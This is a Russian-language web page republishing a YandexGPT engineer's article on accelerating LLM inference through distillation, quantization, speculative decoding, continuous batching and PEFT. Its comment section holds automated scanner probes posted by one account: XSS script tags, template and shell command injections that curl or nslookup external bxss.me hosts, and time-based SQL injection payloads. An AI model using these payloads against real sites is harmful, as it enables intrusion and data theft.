Этот сайт использует файлы cookies. Продолжая просмотр страниц сайта, вы соглашаетесь с использованием файлов cookies. Если вам нужна дополнительная информация, пожалуйста, посетите страницу Политика файлов Cookie
Subscribe
Прямой эфир
Cryptocurrencies: 9505 / Markets: 114717
Market Cap: $ 3 663 340 658 986 / 24h Vol: $ 222 537 540 211 / BTC Dominance: 58.861607907734%

Н Новости

Ускорение инференса LLM

b870bcbf3099d5a9b015899df332aef7.png

Инференсом ML-модели называют процесс её работы на конечном устройстве. Соответственно, чем больше мы разгоняем инференс, тем быстрее работает модель. Скорость может зависеть от разных условий, например, от архитектуры, которую вы выбрали для модели, или от железа, на котором работает устройство. Кроме того, проблема тяжёлого инференса остро ощущается на больших языковых моделях (LLM) так остро, как ни на каких других моделях.

Меня зовут Роман Горб, я старший ML-разработчик в команде YandexGPT. Тема инференса LLM заинтересовала меня, потому что я занимался R&D в квантовании сеток для CV-задач. Сегодня я расскажу, как безболезненно увеличить скорость инференса. Сперва разберёмся, зачем это нужно, а потом рассмотрим разные методы ускорения и фреймворки, которые могут в этом помочь.

Эта статья основана на моей лекции на GPT Week, организованной Школой анализа данных.

Что влияет на скорость инференса и зачем её увеличивать

Итак, на скорость инференса влияет несколько факторов. Самый очевидный — архитектура модели: Encoder Only, Decoder Only, Encoder-Decoder. Хороший пример разных типов моделей — GPT like-модель и T5 like-модель. Обе подходят для работы с текстами, но первая — это только декодировщик трансформера, а вторая — полный трансформер. Кроме того, размер модели и батча, с которым происходит инференс, тоже имеют значение.

Второй фактор — тип задачи. Задачи могут быть генеративными или дискриминативными. К первым относятся Questioning and Answering и Summarization, а ко вторым — классификация и регрессия. Каждый генеративный сценарий, как правило, состоит из нескольких этапов: обработки контекста и самого декодинга, где мы токен за токеном генерируем ответ. На каждом из этапов ускорения можно добиваться по-разному.

Дальше перейдём к нашему железному другу GPU. По сути, это асинхронный ускоритель с памятью и ядрами процессоров. Между ними есть шина, которая может перегонять данные. Если в какой-то момент мы упираемся в её пропускную способность и ядра оказываются недозагружены, наступает так называемое голодание (memory-bound). Из-за него падает производительность: операции выполняются с пропусками. Нужно стремиться избегать таких ситуаций и использовать ядра максимально эффективно.

Взгляд со стороны пользователя: RPS и latency

Все факторы, которые я описал выше, всё же важнее для разработчиков. Для конечного пользователя значение имеют только две метрики: RPS и latency. RPS (requests per second) — это количество запросов, которые сервис способен обрабатывать в секунду, а latency — задержка ответа сервиса. Следовательно, для пользователя важно, чтобы показатель RPS был как можно больше, а latency — как можно меньше.

На графике представлены значения RPS реального сервиса за неделю. Ночью люди спят, и никакие запросы сервису не поступают, а днем запросы есть, и активность растёт
На графике представлены значения RPS реального сервиса за неделю. Ночью люди спят, и никакие запросы сервису не поступают, а днем запросы есть, и активность растёт

Разберём на примере, как это устроено. Допустим, сервис должен обрабатывать 2000 запросов в секунду, а 20% из них мы можем просто закешировать, сэкономив ресурсы. Остаётся 1600 RPS, которые видеокарты должны обрабатывать в реальном времени. Отметим, что это не точная величина, ведь на пике активности значение RPS может подниматься и до 1800. При этом пользователь ожидает, что задержка при запросе составит не более трёх секунд — это целевая latency.

Тесты показали, что одна видеокарта способна держать 6 RPS, впритык укладываясь в заявленные три секунды. Получается, что для нашего сервиса нужно 300 видеокарт, но компания может предоставить только 200. Это ограничение, которое можно обойти, ускорив инференс. Таким образом, ускоряя инференс, мы можем добиваться лучших результатов меньшими ресурсами.

Однако, чтобы добиться желаемого, придётся пойти на компромисс между качеством модели и скоростью её работы. Выбрать подходящую модель поможет график ниже. На оси X находится время генерации в миллисекундах, но здесь можно отобразить RPS, время обработки контекста или генерации одного токена, количество токенов в секунду и другие важные метрики. На оси Y — относительное качество модели, то есть diff от какого-то абсолютного значения.

Точки — это конкретные модели, из которых нужно выбирать. Откуда взять эти точки? Можно обучить несколько базовых моделей и нанести их на график, а дальше ускорять, добавляя всё новые и новые. Так на кривой появится огромное количество точек, а у нас — простор для выбора.

ce94b8d822eb0ac519b9e6760169accb.png

Методы ускорения инференса

Дистилляция

Обычно в этом методе есть какая-то большая модель, которую мы называем учитель (teacher), и модель поменьше — студент (student). Хорошим примером будет YandexGPT-3 — большая LLM, способная решать задачу с наилучшим качеством, но она совершенно не укладывается в наш вычислительный бюджет. Есть модель поменьше, вроде Т5, которая потребляет сильно меньше ресурсов, но не решает задачу так же качественно, как YaGPT-3. Задача Knowledge Distillation состоит в том, чтобы минимизировать потери (loss) между фичами — предсказаниями учителя и студента.

Teacher=p(y|x)Student= q(y|x)L=(p(y|x),q_{\theta}(y|x))\to \min_{\theta}

Самый простой вариант дистилляции hard-label. С помощью учителя мы генерируем таргеты для нашей выборки, а затем обучаемся на них в обычном режиме. Ничего сложного.

\underset{p(y)}{\mathbb{E}}\log{q}_{\theta}(y)\to \max_{\theta}y^{(1)},...y^{(N)}\sim p(y)\frac{1}{N}\sum_{n=1}^{N}\sum_{t=1}^{T_{n}}\log{q}_{\theta}(y_{t}^{(n)}|y_{\lt t}^{(n)})

При дистилляции похожий процесс soft-label, но в objective добавляется ещё и вероятность, полученная от учителя. Под них будет мимикрировать студент.

\frac{1}{N}\sum_{n=1}^{N}\sum_{t=1}^{T_{n}}\sum_{v\in\mathcal{V}}p(y_{t}^{(n)}=\upsilon|y_{\lt t}^{(n)})\log{q}_{\theta}(y_{t}^{(n)}=\upsilon|y_{\lt t}^{(n)})

Давайте заменим функцию loss на KL-дивергенцию — показатель расстояния между двумя распределениями. Конечно, это не метрика в стандартном математическом понимании, но её всё равно можно использовать как функцию для минимизации. Вот как её рассчитать.

D_{\mathrm{KL}}(p(y)\parallel q_{\theta}(y))\to \min_{\theta}\underset{p(y)}{\mathbb{E}}\log{\frac{p(y)}{q_{\theta}(y)}}=-\underset{p(y)}{\mathbb{E}}\log{q}_{\theta}(y)+\mathrm{const}\to \min_{\theta}D_{\mathrm{KL}}(p(y)\parallel q_{\theta}(y))=\underset{p(y)}{\mathbb{E}}\log{\frac{p(y)}{q_{\theta}(y)}}

Так как KL-дивергенция не считается аналитически, её нужно сэмплировать и оценивать по методу Монте-Карло. Чтобы не возникало неопределённости, знаменатель должен быть отличным от нуля, если числитель не равен нулю. Поэтому распределение студента должно накрывать распределение учителя.

Но, как мы знаем, студент — это намного более слабая модель, её распределение не может быть таким же многообразным. Таким образом, её распределение размазывается по прямой и плохо аппроксимирует распределение учителя.

Решить эту проблему призвана обратная KL-дивергенция. Здесь мы сэмплируем уже по студенту в матожидании, меняя местами числитель и знаменатель. Такой подход закрывает возможность дифференцировать по сэмплированным значениям, но с этим можно бороться, причём разными методами. Один из методов включает использование MiniLLM.

\nabla_{\theta}\mathcal{L}=\underset{q_{\theta}(y)}{\mathbb{E}}\log\frac{q_{\theta}(y)}{p(y)}\nabla_{\theta}\log q_{\theta}(y)

Для дифференциации по обратной KL-дивергенции здесь ещё применяется и reinforce-трюк, подробнее о котором можно узнать в курсе Practical RL в ШАДе. Если коротко, то MiniLLM вводят аппроксимацию на градиенты, но те ведут себя нестабильно. Решить проблему можно с помощью PPO (Proximal policy optimization) — алгоритма, который использует методы оптимизации, чтобы обучать агентов.

Этот метод подходит далеко не всем, ведь немногие специалисты умеют правильно настраивать алгоритм. Однако есть три трюка, которые способны заменить PPO.

Первый трюк. Нужно по-другому расписать градиент, чтобы получить формулу ниже. Также градиент можно расписать по шагам, вынести за скобку всё остальное и получить два слагаемых. Итоговая формула дифференцируема автодиффом.

R_{t} —  reward\nabla_{\theta}\mathcal{L}=\underset{q_{\theta}(y)}{\mathbb{E}}\sum_{t=1}^{T}R_{t+1}\nabla_{\theta}\log q_{\theta}(y_{t}|y_{\lt t})+\sum_{t=1}^{T}\underset{q_{\theta}(y_{\lt t}|x)}{\mathbb{E}}\nabla_{\theta}\underset{\text{compute exactly}}{\underbrace{\underset{q_{\theta}(y_{t}|x,y_{\lt t})}{\mathbb{E}}\log\frac{q_{\theta}(y_{t}|y_{\lt t})}{p(y_{t}|y_{\lt t})}}}

Второй трюк. Модели в современном NLP часто любят обманывать reward — взламывать его. Награды высокие, но сами модели не очень умные, поэтому тут нужно добавить регуляризацию, смешав текущие веса студента и изначальной модели. Чтобы просчитать градиенты, нужно поставить в формулу новую q, но это не так-то просто. Придётся прибегнуть к хаку Importance Sampling.

\nabla_{\theta}\mathcal{L}=\underset{\widetilde{q}_{\theta}(y)}{\mathbb{E}}\sum_{t=1}^{T}w_{t}R_{t+1}\nabla_{\theta}\log q_{\theta}(y_{t}|y_{\lt t})+\sum_{t=1}^{T}\underset{\widetilde{q}_{\theta}(y_{\lt t}|x)}{\mathbb{E}}w_{t}\nabla _{\theta}\underset{{q}_{\theta}(y_{t}|x,y_{\lt t})}{\mathbb{E}}\log\frac{q_{\theta}(y_{t}|y_{\lt t})}{p(y_{t}|y_{\lt t})}w_{t}\approx \log\frac{q_{\theta}(y_{t}|y_{\lt t})}{\widetilde{q}_{\theta}(y_{t}|y_{\lt t})}

Третий трюк. Он самый простой — нужно нормализовать длину. Дело в том, что длинные последовательности мешают сходимости, поэтому градиент нужно отрегулировать. Ниже можно увидеть формулу reward для подобных последовательностей. Тут добавляется множитель, в котором Т — константа.

\nabla_{\theta}\mathcal{L}=\underset{\widetilde{q}_{\theta}(y)}{\mathbb{E}}\sum_{t=1}^{T}w_{t}R_{t+1}\nabla_{\theta}\log q_{\theta}(y_{t}|y_{\lt t})+\sum_{t=1}^{T}\underset{\widetilde{q}_{\theta}(y_{\lt t}|x)}{\mathbb{E}}w_{t}\nabla _{\theta}\underset{{q}_{\theta}(y_{t}|x,y_{\lt t})}{\mathbb{E}}\log\frac{q_{\theta}(y_{t}|y_{\lt t})}{p(y_{t}|y_{\lt t})}{R}_{t+1}^{\text{Norm}}=\frac{1}{T-t-1}\sum_{k=t}^{T}\log\frac{q_{\theta}(y_{k}|y_{\lt k})}{p(y_{k}|y_{\lt k})}

В итоге всё выглядит следующим образом. Весьма похоже на дистилляцию soft-label.

\nabla_{\theta}\mathcal{L}=\underset{\widetilde{q}_{\theta}(y)}{\mathbb{E}}\sum_{t=1}^{T}w_{t}\left[ {R}_{t+1}^{\text{Norm}}\nabla_{\theta}\log q_{\theta}(y_{t}|y_{\lt t})+\nabla _{\theta}\underset{{q}_{\theta}(y_{t}|x,y_{\lt t})}{\mathbb{E}}\log\frac{q_{\theta}(y_{t}|y_{\lt t})}{p(y_{t}|y_{\lt t})} \right]

MiniLLM превосходит все представленные бэйзлайны, в том числе KL и дистилляцию hard-label, а также обычное обучение без дистилляции. Если посмотреть на числа, то, например, при дистилляции 13B-модели в 1.3B-модель получится значение 60,7, а простое обучение 2.7B-модели даёт нам 55,4. Так что этот метод позволяет дистиллировать модель и получать качество лучше, чем даёт обычное обучение, даже для большего размера модели!

Бенчмарки для разных семейств моделей
Бенчмарки для разных семейств моделей

Таблицы перечислены слева направо.

  • Таблица 1: Показатели ECE и точности на датасетах SST2 и BoolQ. Лучшие результаты студента выделены жирным шрифтом.

  • Таблица 2: Отчётливые 4-граммы (Dist-4) и потери при моделировании языка (loss) на тестовых наборах на основе семейства LLaMA. MiniLLM сохраняет разнообразие.

  • Таблица 3: Производительность на контрольном и тестовом наборах при применении различных комбинаций трюков в MiniLLM.

KL-дивергенция между учителем и студентом во время обучения MiniLLM при использовании разных комбинаций трюков
KL-дивергенция между учителем и студентом во время обучения MiniLLM при использовании разных комбинаций трюков

Все три трюка важны. Уберите один — и результат станет хуже. При этом трюки не вредят разнообразию — модель не беднеет в плане словарного запаса.

Квантизация

Следующий метод ускорения инференса — квантизация. Глобальная цель этого процесса — перевод весов из типов высокой точности вроде FP16 или FP32 в типы низкой, например, INT1/2/4/8 или, может быть, FP8. При такой операции уменьшается объём занимаемой памяти, но также растет и скорость инференса. Всё из-за стоимости низкобитных вычислений: если вы посмотрите спецификации современных видеокарт, то целочисленные перемножения матриц там стоят кратно дешевле.

Обратите внимание на формулу ниже. X с плавающей точкой мы превратим в INT по хитрой формуле. Разделим его на некоторый scale, который подберём позже, возьмём от этого целую часть, добавим zero point, то есть какой-то сдвиг, чтобы распределение значений хорошо описывалось нашей формулой. После этого сделаем clip в какое-то из разрешённых значений — их всего два в степени количества битов.

{\mathrm{x}}^{\mathbb{(z)}}=\text{clip}(\left\lfloor\frac{\mathrm{x}}{s}\right\rceil+z;0,2^{b}-1)

По такой формуле строится целочисленное представление вещественного числа, но её можно в каком-то смысле обратить — домножить на scale и вычесть zero point из результата. Так можно примерно восстановить исходное число, но, естественно, с потерей части информации. Эти операции называются квантизацией и деквантизацией соответственно, и с их помощью можно ускорять инференс.

\widehat{{\mathrm{x}}}:=q({\mathrm{x}};s,z,b)=s({\mathrm{x}}^\mathbb{{(z)}}-z)\approx \mathrm{x}

Видов квантизации очень много. Во-первых, можно квантизовать только веса, а можно веса и активации, и получать разные типы ускорения. Наша формула — это один из самых простых методов, она использует равномерную сетку значений. Интовые числа расположены на прямой с одинаковым шагом, но можно располагать их и произвольно — такая квантизация называется Non-Uniform.

Симметричная квантизация отличается от асимметричной наличием zero point. Именно его добавление даёт сдвиг относительно нуля.

Если квантизовать каждый параметр с выделенным под него scale и zero point, никакого ускорения не получится. Поэтому нужно работать с целой группой значений — например, со строчкой матрицы или всем тензором. Вся группа при этом превращается в int-ы, сильно сжимается и обзаводится метаинформацией относительно небольшого размера. Такая схема уже способна давать прирост в скорости.

Процесс внедрения квантизации можно разделить на части. Сначала нужно замерить качество с помощью бенчмарков, потому что при этой операции случаются потери информации. Как только мы получим таблицу вроде той, что ниже, можно переходить к внедрению в реальный фреймворк инференса и получать ускорение в продукте. Эти два этапа стоит разделять, поэтому разумно, чтобы ими в команде занимались разные люди.

eadc9a4e21f3e7f25c7453981a4cd8b8.pngНа схеме показан процесс развёртывания LLM на 8 GPU с поддержкой параллелизма моделей, а также на одном GPU только с квантизованными весами
На схеме показан процесс развёртывания LLM на 8 GPU с поддержкой параллелизма моделей, а также на одном GPU только с квантизованными весами

Вообще, методы квантизации можно разделить на два больших класса. Первый — это Post-training quantization (PTQ). В этом процессе нет никакого обучения, а только подбор scale и zero point через статистическую калибровку на небольшой выборке. Для реализации этого метода достаточно будет 1000 примеров. Он стоит недорого и требует совсем немного GPU-времени. В противовес ему идёт Quantization-aware training (QAT). На него тратится колоссальное количество ресурсов, сотни и тысячи GPU-часов, но при этом качество получается выше.

PTQ vs QAT
PTQ vs QAT

Борьба за качество

Квантизация трансформеров началась с BERT like-моделей. Люди попробовали квантовать только веса, и всё получалось. А когда применили ещё и к активациям, возникли большие проблемы выбросов. В нашем тензоре появляются значения, которые сильно выпадают из распределения. При калибровке они учитываются в статистиках, из-за чего scale с zero point подбираются некорректно. Все методы, рассмотренные дальше, с этим борются.

LLM.int8()

Первая статья, в которой проведено хорошее исследование по теме выбросов — LLM.int8(). Авторы в ней выяснили, что выбросы возникают в некоторых фиксированных слоях трансформера. Причём эмпирически доказано, что они не возникают при увеличении размера модели. На самом деле на это влияет падающая перплексия — метрика понимания текста.

В таблице видно, насколько сильно меняются метрики, если убрать выбросы.

Разница в предсказаниях top-1 по вероятности токена с выбросами/без выбросов
Разница в предсказаниях top-1 по вероятности токена с выбросами/без выбросов

SmoothQuant

SmoothQuant принадлежит к подклассу, который квантизует активации и веса. Как мы уже поняли, квантизовать активации довольно сложно из-за выбросов. Разумно частично переложить эту заботу в веса, тогда квантизация активаций станет чуть проще, а весов — чуть сложнее, но благодаря этому балансу в итоге у нас получится квантизация без потерь в качестве.

26e16e4f2f7d21991b52efcb95de47c5.pnge7a4774178b65d9525873c3a155dc401.png

Рассмотрим, как выглядят типичные тензоры в настоящей LLM. Слева изображён тензор активаций, в котором видны большие пилообразные формирования — те самые выбросы. Они возникают несистемно в каналах тензора активаций, поэтому их невозможно определить раз и навсегда. Чтобы прийти к ситуации, изображённой слева, нужно сглаживание (smoothing). Как же его провернуть?

a86268e05094160186408119b17cd642.jpeg8f4e36ffa8324986fa7e1174dc13108d.jpeg

Нужно во все матричные перемножения в сети — синие блоки на схеме, кроме ReLU, — добавить переливание сложности. Оно представляет собой простое домножение на диагональную матрицу активаций и умножение на обратную к ней матрицу весов. Таким образом, при перемножении в линейном слое эти диагональные матрицы сокращаются. Определить диагональную матрицу можно с помощью специальной формулы, основанной на максимальных значениях матрицы активаций и весов смешанных по формуле со слайда. Альфа является гиперпараметром и просто подбирается перебором.

Подходящая сила перемещения α (оптимальной точки) позволяет легко квантизовать как активации, так и веса. Если α слишком велика, то трудно будет трудно квантизовать веса, если слишком мала — активации
Подходящая сила перемещения α (оптимальной точки) позволяет легко квантизовать как активации, так и веса. Если α слишком велика, то трудно будет трудно квантизовать веса, если слишком мала — активации

Просадки по качеству будут, но небольшие. В таблицах ниже проведены замеры бенчмарков для достаточно архаичных моделей. Наши замеры показывают, что качество сохраняется и на свежих моделях вроде YandexGPT.

80ab875d24cc13fca0b0544efb609e8d.png52196e28a685aaca428d64113ac4eb5c.png

Существует несколько модификаций SmoothQuant, которые проиндексированы версиями О1, О2 и О3. В первой мы делаем квантизацию весов per-tensor (с одними scale на весь тензор) и per-token квантованием в активациях. Метаинформации при таком подходе больше, поэтому квантизовать проще.

Мы в Яндексе провели замеры и выяснили, что, несмотря на меньшую скорость, О1-версия — самая качественная и единственная способна квантизовать без потерь. В остальных версиях потери существенные. Позже это подтвердили и авторы статьи из Корнелльского университета, которые и описали этот метод.

Прирост по скорости в этом методе составляет до ×1,3 (для генерации) ×1,5 (для классификации) по latency и ×2 по памяти. Это хороший результат, потому что обычно для получения прироста по latency приходится писать довольно много кода, что может стать нетривиальной задачей для CUDA-разработчиков.

Задержка GPU (мс) для различных схем квантизации. Чем грубее схема квантования, тем меньше задержка. SmoothQuant достигает меньшей задержки по сравнению с FP16 при всех настройках, в то время как LLM.int8() в основном медленнее. Размер батча равен 4
Задержка GPU (мс) для различных схем квантизации. Чем грубее схема квантования, тем меньше задержка. SmoothQuant достигает меньшей задержки по сравнению с FP16 при всех настройках, в то время как LLM.int8() в основном медленнее. Размер батча равен 4
Реализация SmoothQuant-O3 в PyTorch достигает ускорения ×1,51 и в 1,96 раза экономнее расходует память для OPT-моделей на одном графическом процессоре NVIDIA A100-80GB, в то время как LLM.int8() в большинстве случаев замедляет инференс
Реализация SmoothQuant-O3 в PyTorch достигает ускорения ×1,51 и в 1,96 раза экономнее расходует память для OPT-моделей на одном графическом процессоре NVIDIA A100-80GB, в то время как LLM.int8() в большинстве случаев замедляет инференс
Задержка инференса (вверху) и использование памяти (внизу) для реализации FasterTransformer на NVIDIA A100-80GB GPU. Для небольших моделей задержка может быть значительно снижена с помощью SmoothQuant-O3 — до 1,56x по сравнению с FP16. Для больших моделей (OPT-66B и 175B) мы можем достичь аналогичного или даже более быстрого инференса, используя только половину графических процессоров. Затраты памяти сократились почти вдвое по сравнению с FP16
Задержка инференса (вверху) и использование памяти (внизу) для реализации FasterTransformer на NVIDIA A100-80GB GPU. Для небольших моделей задержка может быть значительно снижена с помощью SmoothQuant-O3 — до 1,56x по сравнению с FP16. Для больших моделей (OPT-66B и 175B) мы можем достичь аналогичного или даже более быстрого инференса, используя только половину графических процессоров. Затраты памяти сократились почти вдвое по сравнению с FP16

GPT-Q

Сейчас это далеко не SOTA, но один из самых популярных методов квантизации в индустрии. GPT-Q предполагает хорошую квантизацию только весов в 4 бита, оставляя активации в 16 битах. Должно получиться неплохое ускорение в три раза, как заявляют авторы метода. Но по факту получается только в 1,5–2, причём при условии написания собственной более эффективной реализации CUDA-кернела. Так происходит, потому что production-level фреймворки инференса оптимизированы гораздо лучше, чем те, на которых проводились замеры авторов статьи.

Важно отметить, что ускорение проявляется только в сценарии декодинга, когда мы авторегрессионно генерируем токены. Причём наибольший прирост скорости наблюдается при маленьких батчах — до 8 или 16.

f496d170c76b3a953a39d8bb902f8503.png

Наилучшее ускорение наблюдается на больших моделях, поскольку квантизация весов оптимизирует трансфер по памяти.

Мы не будем подробно разбирать устройство метода, а лучше посмотрим бенчмарки. Тут довольно несовременные модели, без LLaMa — только OPT. Квантизация действительно происходит почти без потерь в 4 бита — в 3 бита потери всё-таки есть. В своих замерах мы выяснили, что также без потерь квантизуются современные архитектуры Decoder Only моделей (e.g. LLaMa), даже если внести в них какие-то архитектурные модификации вроде Group Query Attention (GQA) (ускорения от GPT-Q и GQA складываются). Но потери в качестве, исходя из наших экспериментов, немного усугубляются на моделях <= 7B. При этом на моделях размера вроде 35B их нет.

75271e640a445ff22a3fa4757b672ed5.pngТочность моделей OPT и BLOOM после GPTQ, измеренная на LAMBADA
Точность моделей OPT и BLOOM после GPTQ, измеренная на LAMBADA

Впрочем, много кто использует такую модель в трёхбитном формате, благодаря чему с инференсом 175-миллиардной модели может работать одна видеокарта. Это даёт новые возможности тем, у кого есть какие-либо ограничения в ресурсах GPU.

Сильно более подробное введение и обзор методов квантизации LLM можно почитать в другом нашем посте.

Другие идеи и методы

Первый метод — Speculative Decoding. Предположим, что у нас есть большая модель (например, 70B LLaMa) и маленькая (7B). Их можно скомбинировать в одном сервисе. На маленькую возложим генерацию токенов, а на большую — верификацию.

Мы можем нагенерировать какое-то количество токенов (К в формуле ниже), а затем за один forward pass большой моделью понять, подходят нам они или нет, какую часть токенов принять, а какую выкинуть. Затем можно «бесплатно» сгенерировать ещё один токен большой моделью и запустить процесс заново. Снова генерируем К токенов маленькой моделью, верифицируем и так далее.

При этом все текущие методы Speculative Decoding оптимизируют одну метрику — Acceptance Rate, то есть количество токенов из маленькой модели, которые приняты большой. Чем оно выше, тем выше ускорение и тем больше мы экономим вызовов большой модели.

b49de0c75ef832b7b87fd64416fa8ebf.png

Следующий класс техник — Continuous Batching. Рассмотрим пример. На схеме жёлтым цветом отмечены токены контекста, а синим — первый сгенерированный токен. Красным отмечен конец сгенерированного предложения.

Здесь проблема в возникновении пропусков, или бабблов. Генерируемые гипотезы не являются одинаковыми по длине в токенах, поэтому некоторые из них могут завершиться раньше, чем закончится работа над последними. Из-за этого видеокарта будет простаивать, часть её вычислительных ресурсов окажется без нагрузки.

Чтобы решить эту проблему, нужно заменить «бабблы» на обработку примеров из новых запросов на генерацию. Как это сделать — отдельный и сложный вопрос. Подробнее об этом рассказано в этой статье.

39f16d6e8528dc5d71549bf3075fdb40.png

Последний трюк — Parameter-Efficient Fine-Tuning, или PEFT. Мы уже рассказывали о нём на Хабре. У нас есть одна большая модель, например YandexGPT. К ней можно сделать дообучаемые добавки Prompt Tuning или LoRA. Они весят очень мало, порядка 200 килобайт, и, по сути, это некие картриджи, которые специализируют большую общую модель под конкретную задачу. Такой картридж можно отсылать в API вместе с запросом, что позволяет удобно на одном и том же железе тестировать множество моделей и продуктов на небольшой аудитории или срезе данных. Так можно переиспользовать вычислительные ресурсы на инференсе между несколькими потребителями.

6020c94b2095261e69ab197e07a1d00b.jpeg

В этой статье мы разобрались, в каких случаях нужно ускорять инференс и какие методы для этого существуют.

  • Дистилляция подойдёт в том случае, если у вас есть две модели: большая и маленькая. В идеале использовать PPO для обучения агентов, однако описанные в статье трюки помогут обойтись и без алгоритма.

  • Квантизация помогает сократить объёмы потребляемых вычислительных ресурсов и вместе с тем поднять скорость инференса. Для квантизации только весов можно использовать популярный GPT-Q, а вот для квантизации и весов, и активаций пригодится уже SmoothQuant.

  • Есть и другие способы ускорить инференс, вроде Speculative Decoding и Continuous Batching, которые можно и нужно применять.

  • И наконец, можно комбинировать перечисленные методы для получения наилучшего ускорения.

Надеюсь, статья была вам полезной. Буду рад обсудить в комментариях всё, что касается ускорения инференса.

Источник

  • 09.10.25 08:09 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:09 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    e

  • 09.10.25 08:11 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:12 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}

  • 09.10.25 08:13 pHqghUme

    '"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>

  • 09.10.25 08:13 pHqghUme

    can I ask you a question please?9425407

  • 09.10.25 08:13 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:14 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:16 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    e

  • 09.10.25 08:17 pHqghUme

    "+response.write(9043995*9352716)+"

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:17 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:18 pHqghUme

    $(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:18 pHqghUme

    |(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)

  • 09.10.25 08:18 pHqghUme

    |(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)

  • 09.10.25 08:18 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:19 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:20 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    e

  • 09.10.25 08:21 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:22 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:22 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:22 pHqghUme

    can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  • 09.10.25 08:23 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:23 pHqghUme

    (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  • 09.10.25 08:24 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:24 pHqghUme

    e

  • 09.10.25 08:24 pHqghUme

    can I ask you a question please?-1 waitfor delay '0:0:15' --

  • 09.10.25 08:25 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    e

  • 09.10.25 08:25 pHqghUme

    can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --

  • 09.10.25 08:26 pHqghUme

    can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--

  • 09.10.25 08:26 pHqghUme

    e

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--

  • 09.10.25 08:27 pHqghUme

    can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?'"

  • 09.10.25 08:28 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:28 pHqghUme

    @@olQP6

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891 from DUAL)

  • 09.10.25 08:28 pHqghUme

    (select 198766*667891)

  • 09.10.25 08:30 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:33 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:34 pHqghUme

    if(now()=sysdate(),sleep(15),0)

  • 09.10.25 08:35 pHqghUme

    e

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:36 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:37 pHqghUme

    e

  • 09.10.25 08:40 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:40 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:41 pHqghUme

    e

  • 09.10.25 08:41 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    can I ask you a question please?

  • 09.10.25 08:42 pHqghUme

    is it ok if I upload an image?

  • 09.10.25 08:42 pHqghUme

    e

  • 09.10.25 11:05 marcushenderson624

